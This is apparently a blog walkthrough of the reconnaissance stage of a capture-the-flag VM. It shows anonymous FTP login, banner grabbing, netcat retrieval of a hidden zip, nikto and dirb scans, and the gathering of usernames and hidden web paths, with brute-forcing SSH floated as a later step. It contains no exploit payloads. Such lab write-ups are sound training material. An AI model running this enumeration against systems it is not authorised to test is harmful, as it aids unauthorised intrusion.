Lots of fun stuff to play with.<code><span style="font-size: small;"> </span></code><br />
<br />
<h3>
<code><span style="font-size: small;">Service Exploration</span> </code></h3>
<h3>
<code>FTP</code></h3>
<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~# ftp 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Connected to 192.168.153.142.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-|-----------------------------------------------------------------------------------------|</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-| Harry, make sure to update the banner when you get a chance to show who has access here |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-|-----------------------------------------------------------------------------------------|</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Name (192.168.153.142:root): Anonymous</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">331 Please specify the password.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Password:</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">230 Login successful.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Remote system type is UNIX.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Using binary mode to transfer files.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ftp> ls</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">200 PORT command successful. Consider using PASV.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">150 Here comes the directory listing.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 107 Jun 03 23:06 note</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">226 Directory send OK.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">19</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ftp> get note</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">20</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">local: note remote: note</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">21</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">200 PORT command successful. Consider using PASV.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">22</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">150 Opening BINARY mode data connection for note (107 bytes).</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">23</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">226 Transfer complete.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">24</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">107 bytes received in 0.00 secs (50.0442 kB/s)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">25</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ftp> exit</td></tr>
</tbody></table>
<br />
Interesting a potential user Harry i will add this to the list of potential users.
Reading our loot (note) reveals...
<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~# cat note</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John. </td></tr>
</tbody></table>
Once again more potential users elly and john.
With nothing more to see / do in the FTP realm at this time we move on.<br />
<br />
<h3>
<span style="font-size: small;">SSH</span></h3>
<span style="font-size: small;">Usually there is nothing to gain from trying to SSH at this point but i always connect just to see if the banner (assuming there is one) has any hints that we can put away for a later time.</span><br />
<span style="font-size: small;"> </span>
<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~# ssh 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-----------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">~ Barry, don't forget to put a message here ~</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-----------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@192.168.153.142's password:</td></tr>
</tbody></table>
Sweet, another potential user barry... at this point we can try to brute force the ssh service but i will hold off abit longer just in case. No need to make more noise <span style="font-size: small;">at this point.</span><br />
<br />
<h3>
<span style="font-size: small;">666 - The port of the beast!!!</span></h3>
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~# nc 192.168.153.142 666</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">PK d��Hp� ��, 2</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">message2.jpgUT +�QWJ�QWux</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">� �z</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">T ���P���A@� �UT�T � 2>��RDK �Jj�"DL[E�</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">0<Ĵ�ʮn���V �W�H �</td></tr>
</tbody></table>
Brutal... Looks like someone wants me to have a file of some sort.<br />
Command: nc 192.168.153.142 666 > SatanicFile<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~/Documents/Stapler/Satans_Port# file Satanic_File</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Satanic_File: Zip archive data, at least v2.0 to extract</td></tr>
</tbody></table>
So our Satanic_File seems to be a Zip file.<br />
Command: Unzip Satanic_File<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~/Documents/Stapler/Satans_Port# unzip Satanic_File.zip</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Archive: Satanic_File.zip</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">inflating: message2.jpg</td></tr>
</tbody></table>
So the unzip reveals a JPG that has a message that displays.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw1kiFdFCCkekyas-8RFUHb1XaGhaczjz9QimB7BkKtBxVBtKoK6-pXaFLuO2Ed8WHM5ThEVpVlWZbWEhu4D8Am2xpJI7Z3syFcJSYFYdYo_SI0R7Xwj-D-uEyZLKiGEBAlp997JAw62w/s1600/message2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw1kiFdFCCkekyas-8RFUHb1XaGhaczjz9QimB7BkKtBxVBtKoK6-pXaFLuO2Ed8WHM5ThEVpVlWZbWEhu4D8Am2xpJI7Z3syFcJSYFYdYo_SI0R7Xwj-D-uEyZLKiGEBAlp997JAw62w/s320/message2.jpg" width="320" /></a></div>
Great yet another potential user: scott<br />
Now, i have been burned a couple times in these VMs by not checking out the jpgs for hidden messages. So i always run strings on the images.<br />
Command: strings message2.jpg<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">JFIF</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">vPhotoshop 3.0</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">8BIM</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">1If you are reading this, you should get a cookie!</td></tr>
</tbody></table>
If you are reading this you should get a cookie.....no thanks, i dont eat cookies, i steal them :) Seems that there is nothing else to to with Satans Port. So we move along.<br />
<br />
<h3>
Port 12380</h3>
Trying to figure out what port 12380 contains with netcat was pretty simple.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim3E-cvq_OXhV6p-XvEnWdd6LBYA3Rz781HM-LAUW29f38AiV-FhcxEggEiZAN1Puj4iXSv3PsDQwB5ZN4Xg8GcKXc5sDDUYV-WM7iU0lIkY-JRFZ8NcX49bAg8pF-6sdzaZRPLADY3t4/s1600/New+Bitmap+Image.bmp" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim3E-cvq_OXhV6p-XvEnWdd6LBYA3Rz781HM-LAUW29f38AiV-FhcxEggEiZAN1Puj4iXSv3PsDQwB5ZN4Xg8GcKXc5sDDUYV-WM7iU0lIkY-JRFZ8NcX49bAg8pF-6sdzaZRPLADY3t4/s640/New+Bitmap+Image.bmp" width="640" /></a></div>
Interesting a webpage with 3 more peoples names:<br />
dave<br />
tim<br />
zoe<br />
<br />
Port 80 /12380 : Http(s?)<br />
<br />
Since we know that 12380 turned out to be a website we can now run nikto and dirb/dirbuster against them.<br />
Command: nikto -host 192.168.153.142; dirb http://192.168.153.142<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142; dirb http://192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">- Nikto v2.1.6</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">---------------------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Target IP: 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Target Hostname: 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Target Port: 80</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Start Time: 2016-06-27 10:56:46 (GMT-4)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">---------------------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Server: No banner retrieved</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ The anti-clickjacking X-Frame-Options header is not present.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ No CGI Directories found (use '-C all' to force check all possible dirs)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ End Time: 2016-06-27 10:56:58 (GMT-4) (12 seconds)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">---------------------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">19</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ 1 host(s) tested</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">20</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-----------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">21</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">DIRB v2.22</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">22</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">By The Dark Raver</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">23</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-----------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">24</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">START_TIME: Mon Jun 27 10:56:58 2016</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">25</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">URL_BASE: http://192.168.153.142/</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">26</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">27</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-----------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">28</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">GENERATED WORDS: 4612</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">29</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">---- Scanning URL: http://192.168.153.142/ ----</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">30</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ http://192.168.153.142/.bashrc (CODE:200|SIZE:3771)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">31</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ http://192.168.153.142/.profile (CODE:200|SIZE:675)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">32</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-----------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">33</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">END_TIME: Mon Jun 27 10:57:02 2016</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">34</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">DOWNLOADED: 4612 - FOUND: 2</td></tr>
</tbody></table>
We can see that it initially finds 2 files: .bashrc and .profile.<br />
Looking quickly i didn't find anything of earth-shattering awesome sauce so i moved on to 12380
Command: nikto -host 192.168.153.142 -port 12380;<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142 -port 12380;</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">- Nikto v2.1.6</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">---------------------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Target IP: 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Target Hostname: 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Target Port: 12380</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">---------------------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?<br />
/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Ciphers: ECDHE-RSA-AES256-GCM-SHA384</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre-wrapping;">Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?<br />
/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Start Time: 2016-06-27 11:01:00 (GMT-4)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">---------------------------------------------------------------------------</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Server: Apache/2.4.18 (Ubuntu)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ The anti-clickjacking X-Frame-Options header is not present.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">19</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ No CGI Directories found (use '-C all' to force check all possible dirs)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">20</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">21</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">22</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ "robots.txt" contains 2 entries which should be manually viewed.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">23</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Hostname '192.168.153.142' does not match certificate's names: Red.Initech</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">24</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">25</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ Uncommon header 'x-ob_mode' found, with contents: 1</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">26</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ OSVDB-3233: /icons/README: Apache default file found.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">27</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ /phpmyadmin/: phpMyAdmin directory found</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">28</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">29</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">+ End Time: 2016-06-27 11:02:40 (GMT-4) (100 seconds)</td></tr>
</tbody></table>
<br />
So we are getting a ssl cert and we get another user: pam.<br />
Also, we get 2 folders from the robots.txt file:<br />
admin112233<br />
blogblog (potentially a cms) nice.<br />
Navigating to https://192.168.153.142:12380/admin112233 gives us the following (did you get caught :) )<br />
